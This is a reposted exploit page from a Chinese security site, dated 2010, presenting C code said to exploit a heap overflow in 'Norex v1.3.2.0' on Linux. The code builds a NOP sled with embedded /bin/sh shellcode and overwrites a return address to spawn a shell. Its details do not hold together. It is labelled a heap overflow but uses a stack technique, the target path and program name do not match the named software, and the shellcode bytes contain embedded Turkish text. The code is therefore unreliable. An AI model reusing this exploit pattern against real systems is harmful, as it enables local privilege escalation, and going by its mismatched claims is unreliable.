Norex v1.3.2.0 Argument Heap-Overflow

		当前位置：主页>安全文章>文章资料>Exploits>文章内容

Norex v1.3.2.0 Argument Heap-Overflow

来源：vfocus.net 作者：GoteGELENZI 发布时间：2010-06-23

# Author: SiktirEdenzi aka GoteGELENZI
# Software Link: http://www.muratkaslioglu.com/norex/
# Version: v1.3.2.0
# Tested on: Linux
# CVE :
# Code :

#define PATH_ZEN "/usr/bin/natalex -r"
#define OFFER_SIZE 1024
#define DEFAULT_OFFSET 50

u_long get_esp()
{
__asm__("movl %esp, %eax");

}

main(int argc, char **argv)
{
u_char execshell[] =
"\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f"
"\xb8\x1b\x56\x34\x12\x62\x1f\x74\x1f\x6e\x20\x62\x65\x79\x61\x7a"
"\x20\x1f\x61\x70\x6b\x61\x6c\x61\x72\x20\x61\x6e\x61\x6e\x1f\x7a"
"\x1f\x20\x73\x69\x6b\x65\x6e\x7a\x69\x2c\x20\x68\x75\x7a\x65\x79"
"\x66\x65\x20\x73\x65\x6c\x61\x6d\x6c\x61\x72\x20\x64\x6f\x73\x74"
"\x75\x6d\x20\x6c\x6f\x6c\x27\x64\x35\x10\x56\x34\x12\x8d\x4e\x0b"
"\x8b\xd1\xcd"
"\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/bin/sh";

char *buff = NULL;
unsigned long *addr_ptr = NULL;
char *ptr = NULL;

int i;
int ofs = DEFAULT_OFFSET;

buff = malloc(4096);
if(!buff)
{
printf("can't allocate memory\n");
exit(0);
}
ptr = buff;

memset(ptr, 0x90, OFFER_SIZE-strlen(execshell));
ptr += OFFER_SIZE-strlen(execshell);

for(i=0;i < strlen(execshell);i++)
*(ptr++) = execshell[i];

addr_ptr = (long *)ptr;
for(i=0;i < (8/4);i++)
*(addr_ptr++) = get_esp() + ofs;
ptr = (char *)addr_ptr;
*ptr = 0;

(void)alarm((u_int)0);
execl(PATH_ZEN, "umount", buff, NULL);
}

[

推荐] [

评论(0条)] [返回顶部] [打印本页] [关闭窗口]

匿名评论

评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。

§最新评论：

热点文章

·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1

推荐广告